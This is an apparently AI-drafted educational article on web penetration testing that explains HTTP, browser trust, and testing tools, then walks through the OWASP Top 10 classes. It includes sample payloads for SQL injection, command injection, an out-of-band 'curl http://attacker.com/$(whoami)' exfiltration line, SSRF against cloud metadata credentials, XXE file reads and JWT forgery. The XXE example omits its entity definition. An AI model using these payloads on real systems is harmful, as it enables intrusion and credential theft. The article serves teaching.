Cybersecurity

Cybersecurity

Dec 11, 2025

web application pentest

Dec 11, 2025

The Anatomy of Exploitation: A First-Principles Analysis of Web Architecture and Vulnerability Mechanics

Thinking via first principles requires the analyst to ask not "What tool finds this bug?" but rather "What mechanism allows this bug to exist?" It compels a shift from memorizing exploit payloads to understanding the physics of the targeted system. When a SQL injection occurs, it is not merely a "security flaw"; it is a linguistic failure where an interpreter cannot distinguish between the developer's intended control instructions and the user's supplied data.1 When a Cross-Site Scripting (XSS) payload executes, it is a manifestation of the browser’s trust model—the Same-Origin Policy—being subverted by the injection of an execution context into a presentation layer.

Founder & CEO Image Shubham Khichi

Shubham Khichi

Founder & CEO

Founder & CEO Image Shubham Khichi

Shubham Khichi

1. Introduction: The Philosophy of First Principles in Cybersecurity

At CyberAGI we are building the foundations of the future where cybersecurity will be managed by Ai agents. To get there I want to first understand and explain(with the help of Ai) how does the web application security works through first principles. No fancy tooling, just detailed writeup on why things are the way they are.

Disclaimer: This article was heavily edited by a human but drafted by Ai, just like everything on the digital space.

The discipline of offensive security, specifically web penetration testing, is frequently mischaracterized as a practice of tool execution. In the popular imagination, and indeed in the workflow of novice practitioners, the focus often rests on the utilization of automated scanners—software suites designed to identify known patterns of vulnerability. However, a reliance on abstraction layers obscures the fundamental reality of the web: it is a deterministic system governed by specific protocols, architectural decisions, and logical structures. To truly master the art of exploitation, one must abandon the "tool-first" mindset and adopt a "first-principles" approach. This necessitates deconstructing the web into its constituent parts—the raw electrical signals of the network, the text-based conversations of the HTTP protocol, the state machines of databases, and the execution contexts of browsers.

Thinking via first principles requires the analyst to ask not "What tool finds this bug?" but rather "What mechanism allows this bug to exist?" It compels a shift from memorizing exploit payloads to understanding the physics of the targeted system. When a SQL injection occurs, it is not merely a "security flaw"; it is a linguistic failure where an interpreter cannot distinguish between the developer's intended control instructions and the user's supplied data.1 When a Cross-Site Scripting (XSS) payload executes, it is a manifestation of the browser’s trust model—the Same-Origin Policy—being subverted by the injection of an execution context into a presentation layer.

This report provides an exhaustive, granular analysis of web penetration testing through this foundational lens. We will strip away the graphical user interfaces of browsers and testing suites to examine the raw bytes of communication. We will explore the mechanics of the HTTP protocol, the manual manipulation of sockets using foundational tools like curl and netcat, and perform a deep-dive technical dissection of the OWASP Top 10 (2025) vulnerability classes.4 By understanding the root causes—such as how a SQL parser constructs an Abstract Syntax Tree or how an XML processor handles external entities—we establish a methodology that is robust, adaptable, and independent of specific vendor tooling.

2. The Physics of the Web: Protocol Architecture and State

To exploit a web application, the security researcher must first possess an intimate understanding of the medium through which it communicates. The World Wide Web is built upon the Hypertext Transfer Protocol (HTTP), an application-layer protocol that operates over the TCP/IP stack.5 While modern browsers render this communication as seamless multimedia experiences, the underlying reality is a series of discrete, text-based transactions.

2.1 The Anatomy of HTTP: Deconstructing the Conversation

At its core, web penetration testing is the manipulation of text strings sent over a socket. When a user interacts with a web application, the browser acts as a User-Agent, translating user actions into HTTP requests. A first-principles approach requires us to bypass this translation layer and interact directly with the protocol.5

2.1.1 The Request-Response Cycle and Method Semantics

The fundamental unit of web communication is the request-response pair. A client initiates a TCP connection to a server (typically on port 80 or 443) and transmits a text block containing a method, a Uniform Resource Identifier (URI), headers, and an optional body.

The Request Line dictates the intent of the transaction. The HTTP method (or verb) is the primary operator. While GET and POST are ubiquitous, the semantic distinctions between them are critical for security logic. GET requests are designed to retrieve data and should be idempotent—meaning multiple identical requests should have the same effect as a single request.7 Vulnerabilities often arise when developers violate these semantic rules. For instance, if a developer allows a state-changing action (like deleting a user) via a GET request, they inadvertently open the door to Cross-Site Request Forgery (CSRF), as GET requests are easily triggered by third-party sites via image tags or links.6

The POST method, conversely, is designed to submit data to be processed to a specified resource. It typically carries a payload in the message body. The format of this body—whether application/x-www-form-urlencoded, multipart/form-data, or application/json—dictates how the server parses the input. Understanding the parser's behavior is key to exploitation; a server expecting JSON might crash or behave unexpectedly if fed XML, potentially revealing stack traces or other sensitive information.7

2.1.2 The Control Plane: HTTP Headers

Headers function as the metadata control plane of the web. They govern caching, content negotiation, authentication, and security policies. From a first-principles perspective, headers are not static requirements but injection vectors and logic toggles.

The Host header, mandatory in HTTP/1.1, specifies the domain name of the server.5 This allows for Virtual Hosting, where a single IP address serves multiple domains. If a server blindly trusts the Host header to generate password reset links or import scripts, it leads to Host Header Injection attacks, where an attacker can poison the cache or redirect users to malicious domains.

Security headers such as Content-Security-Policy (CSP) and X-Frame-Options act as defensive layers instructed by the server but enforced by the browser.8 A penetration tester must analyze these headers to determine the feasibility of client-side attacks. For example, a missing X-Frame-Options header suggests susceptibility to Clickjacking, while a weak CSP might allow for the execution of inline scripts (XSS).8

2.1.3 The Myth of Stateful Connection

A critical concept in web architecture is that HTTP is inherently stateless. The server retains no memory of previous requests by default.6 To create cohesive applications—such as a shopping cart or a logged-in user area—developers must layer a state management mechanism on top of this stateless protocol.

This is primarily achieved via Session Identifiers, typically stored in Cookies. The security of the entire application often rests on the entropy, generation, and handling of this single string of characters.9 Understanding that "logging in" is simply the exchange of a token allows a tester to realize that bypassing authentication often means stealing, predicting, or forcing this token rather than cracking a password. If the session ID is predictable (e.g., a sequential number), the attacker can hijack sessions by iterating through the sequence. If the session ID is fixed (Session Fixation), the attacker can force a victim to use a known ID, thereby gaining access to the victim's authenticated state.10

2.2 The Browser Execution Context: The DOM and SOP

On the client side, the browser is not merely a document viewer; it is a complex code execution platform. The Document Object Model (DOM) is the API through which JavaScript interacts with the page structure.3

2.2.1 Same-Origin Policy (SOP)

The cornerstone of web security is the Same-Origin Policy (SOP). This mechanism restricts how a document or script loaded from one origin can interact with a resource from another origin. An origin is defined by the tuple of protocol, domain, and port. Without SOP, a malicious website open in one tab could read the email contents of a webmail service open in another tab.3

2.2.2 Cross-Origin Resource Sharing (CORS)

Because the modern web requires interaction between different domains (e.g., accessing an API hosted on a different subdomain), Cross-Origin Resource Sharing (CORS) was introduced. CORS uses specific HTTP headers (Access-Control-Allow-Origin) to selectively relax the SOP.12 Exploiting CORS configurations is essentially an attempt to manipulate this trust negotiation. A common misconfiguration involves the null origin. Developers may allow the null origin to support local file testing, but an attacker can trigger a null origin request via a sandboxed iframe, potentially bypassing the restriction and accessing sensitive data if the server reflects the null origin in its response headers.13

2.3 The Mechanism of Interception: Man-in-the-Middle

To manipulate web traffic effectively, the penetration tester must interpose themselves between the client and the server. This is the role of the HTTP Proxy.

A proxy server like Burp Suite or OWASP ZAP functions by establishing two distinct TCP connections: one between the browser and the proxy, and another between the proxy and the server.15 This architecture allows the tester to pause, inspect, and modify traffic in transit—a capability impossible with a standard browser.

For encrypted traffic (HTTPS), the proxy must perform TLS Termination. It acts as a Certificate Authority (CA), dynamically generating fake certificates for the target domains. The browser must be configured to trust the proxy's root CA certificate. If this trust is established, the proxy can decrypt the traffic, display it to the tester, re-encrypt it, and forward it to the server.15 This mechanism highlights a critical security principle: the chain of trust. Encryption is only as secure as the integrity of the Certificate Authorities trusted by the client.

3. The Laboratory: Tooling from the Ground Up

The user query specifically requests a comparison between manual tools and automated suites like Burp Suite. To think deeply about pentesting, one must recognize that Burp Suite is essentially an automation and workflow wrapper around basic socket manipulation. A mastery of the underlying manual tools provides the intuition necessary to use complex suites effectively.

3.1 The "First Principles" Toolset: Curl, Netcat, and OpenSSL

Before employing a Graphical User Interface (GUI), an expert must be comfortable communicating with a web server using raw text. This removes the abstraction layer and reveals exactly what is being sent and received, free from the automatic behaviors of modern browsers.

3.1.1 curl – The Protocol Surgeon

curl is the industry standard for constructing HTTP requests via the command line. Unlike a browser, which automatically appends headers like User-Agent, Accept, Referer, and Cookie, curl sends only what is explicitly defined (with minor defaults). This allows a tester to strip a request down to its bare minimum to identify exactly what the server requires to process a transaction.16

  • Header Manipulation: A browser might hide the effects of Virtual Host routing. By using curl -H "Host: internal.admin" http://target.com, a tester can manually probe for internal administrative panels that are routed based on the Host header but reside on the same public-facing IP address.16

  • Verbosity and Debugging: The -v (verbose) flag is indispensable. It reveals the handshake details, the raw request headers, and the raw response headers.17 Analyzing the raw response headers is often the first step in fingerprinting a server. A header reading Server: Apache/2.4.49 instantly alerts a knowledgeable tester to the potential for a Path Traversal vulnerability (CVE-2021-41773).

  • State Management (Cookies): While browsers manage cookies implicitly, curl requires manual intervention. The -c flag (cookie-jar) writes cookies to a file, and the -b flag reads them.18 This manual management reinforces the fundamental concept that a user session is nothing more than a text file containing a token, which must be presented to the server with every request.

  • Data Fidelity: The --data-binary flag allows for the transmission of data exactly as specified, without any processing or stripping of newlines. This is crucial when exploiting vulnerabilities that depend on byte-level precision, such as specific deserialization attacks or request smuggling.20

3.1.2 netcat – Raw Socket Interaction

For an even deeper level of analysis, netcat (nc) allows sending raw bytes to a TCP port.

  • Exercise: Executing nc target.com 80 followed by typing GET / HTTP/1.1 and Host: target.com manually demonstrates that HTTP is, at its root, a conversation in text.

  • Strategic Value: This technique is vital when curl or a browser automatically "fixes" a malformed request. In advanced attacks like HTTP Request Smuggling, the attacker intentionally sends malformed headers (e.g., conflicting Content-Length and Transfer-Encoding headers). High-level tools might correct these errors before sending, whereas netcat sends exactly what is typed, allowing the tester to probe the server's parsing logic directly.16

3.1.3 Python – The Automation Engine

When an exploit requires complex logic—such as logging in, extracting a CSRF token from the response, encoding a payload, and sending a second request—curl becomes cumbersome. Python's requests library serves as the bridge between manual testing and automated exploitation.

  • Fuzzing: Writing a simple fuzzer in Python (looping through a wordlist and sending requests) is often more flexible than configuring a commercial tool. It allows for custom error handling, timing delays to avoid rate limits, and logic-based stopping conditions.21

  • First Principles Fuzzing: A basic Python fuzzer demonstrates that vulnerability discovery is often a statistical game of "input vs. expected output." By iterating through 10,000 potential directory names or 5,000 common passwords, the tester is mathematically exhausting the search space.23

3.2 Burp Suite: The Architect's Workbench

Burp Suite is the industry standard not because it performs magic, but because it optimizes the workflow of interception, modification, and analysis.24 It aggregates the functionalities of curl, netcat, and Python scripts into a cohesive interface.

3.2.1 Proxy & Intercept

The Proxy component pauses the request "in flight." It allows the human analyst to modify data after the browser generates it but before the server processes it.24

  • Usage Principle: This is critical for bypassing client-side validation. A web form might use JavaScript to prevent a user from entering a negative price for a product. However, the server processes the HTTP request, not the JavaScript form. By intercepting the request and changing the price to -1.00, the tester proves that client-side validation is a User Experience (UX) feature, not a security control.

  • Configuration: The Proxy listener typically runs on 127.0.0.1:8080. The tester must configure the browser to route traffic through this address. This establishes the MITM position described in Section 2.3.25

3.2.2 Repeater: The Iterative Probe

Repeater is the GUI equivalent of curl. It allows for the iterative modification and re-transmission of a single request.

  • Workflow: When a potentially interesting behavior is observed (e.g., a specific error message or a timing delay), the request is sent to Repeater. The tester then "fuzzes" the parameters manually—changing a single quote to a double quote, adding a logic operator, or changing an ID—to observe the server's specific response in isolation.24 This isolation is key to the scientific method of debugging and exploitation.

3.2.3 Intruder: The Fuzzing Engine

Intruder automates the work of Repeater. It is essentially a configurable for loop wrapping an HTTP request.

  • Attack Types:

    • Sniper: Replaces a single payload position with a list of values. Ideal for parameter fuzzing (e.g., checking one input field for XSS).

    • Battering Ram: Places the same payload into multiple positions simultaneously.

    • Pitchfork: Iterates through multiple payload sets simultaneously (e.g., testing a list of usernames with a corresponding list of passwords).

    • Cluster Bomb: Iterates through every combination of multiple payload sets (e.g., every username with every password). This is computationally expensive but exhaustive.24

4. Vulnerability Class Deep Dives: The OWASP Top 10 (2025)

The 2025 iteration of the OWASP Top 10 reflects a shift toward identifying root causes rather than just symptoms.4 We will now dissect these vulnerabilities, moving from their architectural origins to detection and exploitation.

4.1 Broken Access Control (A01:2025)

Broken Access Control remains the most prevalent web vulnerability because it relies heavily on business logic, which automated scanners struggle to interpret contextually.4

4.1.1 Root Cause: The Failure of Authorization Logic

Authentication answers the question "Who are you?", while Authorization answers "What are you allowed to do?". Broken Access Control occurs when the server fails to verify the latter on every request, often relying on the client to hide unauthorized functions or assuming that knowing a resource's ID implies permission to access it.

Insecure Direct Object References (IDOR) are a prime example. This vulnerability arises when an application uses a user-supplied input (like a database key or filename) to access an object directly without an access control check.29 The root cause is the decoupling of the object reference from the session's permission set. The server sees "Request for Object 123" and fulfills it, ignoring the fact that "User A" (the requester) does not own "Object 123."

4.1.2 Exploitation Mechanics

  • Target Identification: The tester looks for exposed references in URLs, cookies, or API parameters (e.g., id=1234, account_number=5555, file=report.pdf).30

  • Manual Exploitation (The "Change-One-Digit" Test):

    1. Baseline: Log in as User A and retrieve a resource: GET /api/invoices?id=100.

    2. Hypothesis: If the system is stateless and checks only authentication (who I am) but not authorization (what I own), requesting id=101 (User B's invoice) should succeed.

    3. Execution (curl): curl -b "session=..." https://api.site.com/invoices?id=101.

    4. Analysis: If the server returns a 200 OK with data instead of a 403 Forbidden, the vulnerability is confirmed.

  • Burp Suite Workflow:

    1. Capture the legitimate request in Proxy.

    2. Send to Intruder.

    3. Define the ID parameter as the payload position.

    4. Use a "Numbers" payload type (Sequential) to iterate from the known ID to neighboring IDs.

    5. Analysis: Filter results by Content-Length. A successful IDOR often results in a different response size compared to a "Not Found" or "Forbidden" error.26

4.1.3 Privilege Escalation

This class also encompasses Privilege Escalation, which can be categorized as:

  • Horizontal: Accessing the data of peers (e.g., IDOR).31

  • Vertical: Accessing functionality of higher-tier roles (e.g., User accessing Admin functions).

  • Mass Assignment: A modern variant common in API-driven apps. If a user profile update sends a JSON object {"username": "user", "role": "user"}, the attacker can intercept the request and modify it to {"role": "admin"}. If the backend framework binds this input directly to the internal user model without filtering, the role is updated, bypassing the intended logic.32

4.2 Injection Vulnerabilities (A05:2025)

Injection flaws occur when untrusted user data is sent to an interpreter as part of a command or query. The interpreter, lacking context, cannot distinguish between the code (the developer's query instructions) and the data (the user's input).2

4.2.1 SQL Injection (SQLi)

  • First Principles - The Parser: A database engine parses a SQL query into an Abstract Syntax Tree (AST) before execution. When a query is constructed via string concatenation (e.g., SELECT * FROM users WHERE name = ' + userInput + '), the developer intends userInput to be a leaf node (a literal string) in the AST. However, if the input contains specific characters like ' OR 1=1 --, the parser interprets the quote as a delimiter, closing the string node and interpreting the subsequent characters as logic nodes in the tree.1

  • Exploitation Methodology:

    1. Detection (Syntax Breaking): Send a single quote '. If the server returns a 500 Internal Server Error or a database syntax error, it indicates that the input successfully broke the query structure and corrupted the AST.34

    2. Boolean-Blind (Logic Inference): If errors are suppressed, the tester must infer the query structure by asking the database True/False questions.

      • Payload A: id=1' AND '1'='1 (Logically True). Result: Page loads normally.

      • Payload B: id=1' AND '1'='2 (Logically False). Result: Page is missing data or empty.

      • Conclusion: The input is being evaluated as logic.35

    3. Union-Based (Data Extraction): The UNION operator allows combining the results of two queries. The attacker appends UNION SELECT to the original query to retrieve data from other tables (e.g., passwords). This requires the injected query to match the column count and data types of the original query.34

4.2.2 OS Command Injection

  • Root Cause: This occurs when an application passes unsafe user data to a system shell (like /bin/sh or cmd.exe) using functions like system(), exec(), or Runtime.exec(). Shells use metacharacters (&, |, ;, $(), `) to chain multiple commands together.36

  • Exploitation:

    • Scenario: A web interface for a network diagnostic tool that runs ping [IP].

    • Attack: Input 127.0.0.1; cat /etc/passwd.

    • Mechanism: The shell sees the semicolon as a command separator. It executes ping 127.0.0.1 successfully, and then immediately executes cat /etc/passwd, returning the output of both to the user.36

  • Out-of-Band (OAST): In "Blind" scenarios where the application does not return the command output, the tester must force the server to connect back to a controlled system.

    • Payload: ; curl http://attacker.com/$(whoami) or ; nslookup $(whoami).attacker.com.

    • Mechanism: The shell executes the command, resolves the DNS name containing the result of whoami, and the attacker sees the result in their DNS server logs.39

4.3 Cryptographic Failures (A04:2025)

This category focuses on failures related to data protection in transit and at rest. A critical area relevant to web testing is the misuse of cryptographic signatures in JSON Web Tokens (JWT) and padding oracles.4

4.3.1 JSON Web Token (JWT) Vulnerabilities

  • Architecture: A JWT is a self-contained token structure comprising a Header, Payload, and Signature, separated by dots. The signature is generated using a secret key to ensure integrity. Vulnerabilities arise when the library or implementation fails to verify this signature correctly.40

  • The "None" Algorithm: The JWT specification historically included a "none" algorithm, intended for debugging, which signifies that the token is unsigned. If a server's JWT library accepts this algorithm by default, an attacker can trivially bypass authentication.

    • Exploitation Steps:

      1. Decode the JWT Header (Base64Url).

      2. Modify the header to {"alg": "none", "typ": "JWT"}.

      3. Modify the payload to elevate privileges (e.g., "role": "admin").

      4. Remove the signature bytes (leaving the trailing dot).

      5. Send the forged token. The server, seeing "none", skips signature verification and accepts the admin claim.41

  • Algorithm Confusion (RS256 to HS256): If a server expects an RSA (asymmetric) signature but the attacker forces HMAC (symmetric) via the header, the server might use its public key as the secret key for HMAC verification. Since the public key is public, the attacker can sign their own tokens.42

4.3.2 Padding Oracle Attacks

  • Physics of the Flaw: In Cipher Block Chaining (CBC) mode, decryption involves XORing the output of the decryption function with the previous ciphertext block to recover the plaintext. This creates a dependency chain. Padding (PKCS#7) is added to ensure the data fits the block size.43

  • The Oracle: If a server reveals whether the padding of a decrypted message is valid or invalid (via a distinct error message or a timing difference), it acts as an "Oracle."

  • Exploitation: An attacker can manipulate the ciphertext byte-by-byte. By observing the Oracle's response (Valid/Invalid Padding), the attacker can mathematically deduce the intermediate state of the decryption and recover the plaintext without ever knowing the encryption key. This demonstrates that cryptography is fragile; leaking a single bit of information (validity of padding) can compromise the entire confidentiality of the message.44

4.4 Server-Side Request Forgery (SSRF)

SSRF is a vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. It represents a violation of the "Trust Boundary".46

4.4.1 Mechanics and Cloud Implications

Modern web applications often run in cloud environments (AWS, GCP, Azure) or microservice architectures. In these environments, the server often has access to internal, non-public networks or loopback interfaces that are trusted implicitly.

  • The Target: AWS Instance Metadata Service (IMDS): A specific, high-value target in AWS environments is the link-local address 169.254.169.254. This IP is non-routable over the internet and is accessible only from within the EC2 instance.46

  • Exploitation:

    1. Identification: Find a feature that fetches URLs (e.g., "Import Profile from URL," "Webhooks," or "PDF Generators").

    2. Payload: Input http://169.254.169.254/latest/meta-data/iam/security-credentials/.

    3. Impact: The server fetches this URL. Since the request originates from the server itself (localhost), the cloud platform allows it. The response contains the temporary AWS Access Keys and Secret Keys assigned to that instance.

    4. Consequence: The attacker can extract these keys and use the AWS CLI to authenticate as the server, potentially gaining control over S3 buckets, databases, or the entire cloud infrastructure.48

4.5 Security Misconfiguration: XML External Entities (XXE)

XXE is a vulnerability in XML parsers that arises from the processing of external data references defined in the document structure.

4.5.1 Root Cause: DTDs and the SYSTEM Directive

The XML standard includes Document Type Definitions (DTDs), which define the structure of an XML document. DTDs allow the definition of "Entities"—variables that can be used throughout the document. Crucially, the SYSTEM keyword allows these entities to be defined by pulling data from external URIs, which can be file paths (file://) or URLs (http://).50

4.5.2 Exploitation Mechanics

  • Scenario: An application accepts XML input (e.g., a SOAP endpoint or a file uploader that parses SVG images).

  • Payload Construction:

    XML

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo>
    <foo>&xxe;</foo>
  • Execution: When the XML parser processes the &xxe; reference, it obeys the SYSTEM directive. It reads the local /etc/passwd file from the server's filesystem and substitutes the entity with the file's content. If the application reflects the content of <foo> back to the user, the password file is disclosed.51

  • Blind XXE: If the application processes the XML but does not display the output, the attacker relies on Out-of-Band (OOB) exfiltration. The malicious entity is defined to make an HTTP request to an attacker-controlled server (e.g., http://attacker.com/?data=), appending the file content as a URL parameter. The attacker then monitors their server logs to retrieve the data.52

4.6 Insecure Deserialization (A08:2025)

Insecure Deserialization is a complex class of vulnerability that involves the restoration of programming objects from a byte stream or structured text format.

4.6.1 The Mechanics of Serialization

Serialization is the process of converting an object (which contains both code/methods and data/attributes) into a format that can be stored or transmitted (like a JSON string or a binary stream). Deserialization is the reverse process. Vulnerabilities occur when the deserialization engine treats the incoming byte stream as trusted, effectively instantiating objects defined by the attacker.53

4.6.2 Gadget Chains

  • Concept: An attacker generally cannot just inject a malicious script directly into the stream. Instead, they must reuse existing code available in the application's classpath. This technique is known as building a "Gadget Chain."

  • Mechanism:

    1. Entry Point: The attacker finds a class with a "magic method" that executes automatically upon deserialization (e.g., __wakeup() in PHP, readObject() in Java, or __reduce__ in Python).

    2. The Chain: The attacker manipulates the data members of this class so that its magic method calls a method in another class, which calls another, and so on.

    3. The Sink: The chain eventually reaches a method that performs a dangerous action, such as executing a system command (Runtime.exec()) or writing a file.

  • Exploitation: Tools like ysoserial are used to generate these payloads. The tool analyzes common libraries (like Apache Commons Collections) to find pre-existing gadget chains. The pentester generates a payload using ysoserial, sends it to the vulnerable endpoint, and the server deserializes it, triggering the chain reaction that leads to Remote Code Execution (RCE).54

4.7 Software Supply Chain Failures (A06:2025)

This category represents a shift in focus from the vulnerabilities in the application code itself to the vulnerabilities in the dependencies and pipelines used to build and deploy it.4

4.7.1 CI/CD Integrity and Dependency Confusion

  • The Attack Vector: Compromising the build pipeline. If an attacker can inject malicious code into a Continuous Integration/Continuous Deployment (CI/CD) pipeline (e.g., GitHub Actions, Jenkins), the malware is integrated into the application before it is signed and deployed.

  • Dependency Confusion: This is a specific technique where an attacker identifies the name of an internal, private software package used by a company (e.g., company-auth-lib). The attacker then publishes a malicious package with the same name but a higher version number to a public repository like npm or PyPI. When the automated build system runs, it defaults to pulling the latest version. Since the public version is higher, the build system pulls the malware from the public repository instead of the legitimate internal package, compromising the build.57

4.8 Identification and Authentication Failures (A07:2025)

This category covers weaknesses in confirming the user's identity and maintaining that identity session.4

4.8.1 Session Fixation

  • Mechanism: In a Session Fixation attack, the attacker obtains a valid session ID (often by simply visiting the login page themselves). They then trick the victim into using this specific ID, perhaps by sending a link like http://site.com/login?PHPSESSID=attacker_known_id.

  • The Flaw: Vulnerable applications accept the session ID provided in the URL or cookie and establish the session before authentication. When the victim enters their credentials, the server authenticates the session but fails to issue a new ID. The attacker, who already knows the ID, now possesses an authenticated session without ever needing the victim's password.11

4.8.2 OAuth 2.0 Flaws

  • Redirect URI Manipulation: In an OAuth flow, the user authenticates with a provider (e.g., Google) and is redirected back to the application with an authorization code. The application sends a redirect_uri parameter to tell the provider where to send the user.

  • Exploitation: If the application does not strictly validate this redirect_uri against a whitelist, an attacker can modify the parameter to point to their own server (e.g., attacker.com). When the user authenticates, the provider redirects them—along with the sensitive authorization code—to the attacker's server. The attacker captures the code and exchanges it for an access token, gaining control of the user's account.59

4.9 Security Logging and Monitoring Failures (A09:2025)

This category is unique as it addresses the organization's ability to detect an attack in progress.61

4.9.1 Active Reconnaissance as a Metric

  • The Pentester's Role: During a pentest, the researcher performs "Active Reconnaissance." This involves aggressive actions like Port Scanning with nmap or directory brute-forcing with gobuster or dirb.62

  • The Failure: These activities generate massive amounts of network noise—thousands of 404 errors, rapid connection resets, and anomalous traffic patterns. If the organization's Security Operations Center (SOC) fails to alert on or block the pentester's IP address during this noisy phase, it constitutes a failure of Security Logging and Monitoring. The ability to attack a system for days without detection is a critical finding in any report.63

4.10 Race Conditions and Logic Flaws

Race conditions exploit the timing gap between the checking of a condition and the execution of an action (Time-of-Check to Time-of-Use, or TOCTOU).

4.10.1 Limit Overrun

  • Scenario: An e-commerce site allows a discount code to be used "only once per account."

  • Mechanism: The application logic flows as follows:

    1. Check: "Has this user used the coupon?" (Read Database)

    2. If No: Apply Discount.

    3. Action: "Mark coupon as used." (Write Database)

  • The Exploit: An attacker uses a tool like Burp Suite's "Turbo Intruder" to send 20 requests for the coupon simultaneously (often using HTTP/2 Single Packet Attack techniques).

  • The Race: All 20 requests arrive and are processed by parallel threads. They all execute Step 1 (Check) before any of them reach Step 3 (Write). Since the database hasn't been updated yet, all 20 threads see the coupon as "unused," and the discount is applied 20 times. This vulnerability bypasses the intended business logic purely through the manipulation of time and concurrency.64

5. Conclusion

Web penetration testing, when approached from first principles, reveals that vulnerabilities are rarely random accidents. They are the logical, deterministic consequences of architectural decisions, protocol behaviors, and the complexity of state management.

SQL Injection is not just a coding error; it is a failure of the interpreter to maintain the boundary between control plane and data plane. XSS is not just a script injection; it is a subversion of the browser's trust model (SOP). SSRF is a violation of network trust boundaries in cloud architectures.

By mastering the underlying protocols (HTTP/TCP), the execution environments (Browsers, Parsers, Shells), and the manual tools that manipulate them (curl, netcat, Python), a security practitioner moves beyond the limitations of automated scanners. They gain the ability to identify subtle logic flaws, chain complex vulnerabilities, and understand the true security posture of a web application. The transition from using a tool like Burp Suite as a "magic button" to using it as a surgical instrument for protocol manipulation marks the evolution from novice to expert.

Vulnerability Mechanics Summary

Vulnerability

Mechanism (Root Cause)

Primary Manual Test

SQL Injection

Breaking the Abstract Syntax Tree (AST) via delimiter injection.

curl... ' OR 1=1 --

XSS (DOM)

Data flow from untrusted Source to execution Sink without sanitization.

Inspect location.search -> document.write

SSRF

Server trusting input to fetch internal resources (Trust Boundary violation).

curl... url=http://169.254.169.254

IDOR

Failure of stateful Authorization checks on direct object references.

Change ID in URL, compare HTTP 200 vs 403

XXE

Abuse of DTD SYSTEM directive for external entity expansion.

Inject <!ENTITY xxe SYSTEM "file:///">

Command Injection

Shell metacharacter interpretation chaining commands.

Inject ; id or `

JWT None Algo

Logical flaw in signature verification algorithm trust.

Modify header alg: none, strip signature

Race Condition

Time-of-Check to Time-of-Use (TOCTOU) gap in concurrent processing.

Send parallel requests (Turbo Intruder)